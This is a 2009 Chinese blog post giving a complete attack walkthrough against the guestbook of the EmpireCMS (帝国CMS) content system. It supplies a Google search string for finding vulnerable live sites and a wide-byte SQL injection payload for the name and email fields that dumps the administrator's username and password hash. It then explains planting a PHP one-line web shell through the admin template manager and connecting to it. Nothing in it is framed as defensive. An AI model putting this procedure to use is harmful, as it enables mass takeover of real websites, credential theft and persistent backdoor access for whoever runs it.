帝国CMS系统注入漏洞--留言本

2009, December 8, 5:07 PM. 漏洞集研
Submitted by admin

Qglfnt's Blog
话说这个洞也出来一段时间了(注:可以看这里:/Article/200906/39299.html),看到网上那些站都被日了。
直接说如何利用。
打开Google以关键字inurl:e/tool/gbook/?bid=1进行搜索。
搜索出来的是留言本,其实就是留言本出现漏洞了。
如图

大小: 11.6 K
尺寸: 353 x 194
浏览: 45 次
点击打开新窗口浏览全图

主要填写您的姓名和联系邮箱这两处,其它的随便填。
您的姓名:縗\
联系邮箱:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
然后进行提交返回页面即爆出用户名密码。

大小: 9.82 K
尺寸: 490 x 57
浏览: 55 次
点击打开新窗口浏览全图

人品好的话,密码破解成功后进入网站后台,后台地址 e/admin/
接着拿shell,进入后台后点顶部模板管理

大小: 11.44 K
尺寸: 471 x 56
浏览: 42 次
点击打开新窗口浏览全图

然后左边的自定义页面-增加自定义页面,页面内容填写PHP一句话,<\?php eval($_POST[cmd]);?\>

大小: 19.73 K
尺寸: 409 x 190
浏览: 46 次
点击打开新窗口浏览全图

完了,回到管理自定义页面,点击刚才起的页面名称。页面直接跳转到e/admin/template/x.php,提示会找不到页面,去掉template即可。真实地址是e/admin/x.php,如显示一片空白的话就成功了。
最后用lanker微型PHP+ASP双用版连接一句话即可。
提示:别死心眼啊,自定义页面内容可以改成ASP的。

Tags: 帝国cms

« 上一篇 | 下一篇 »

Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):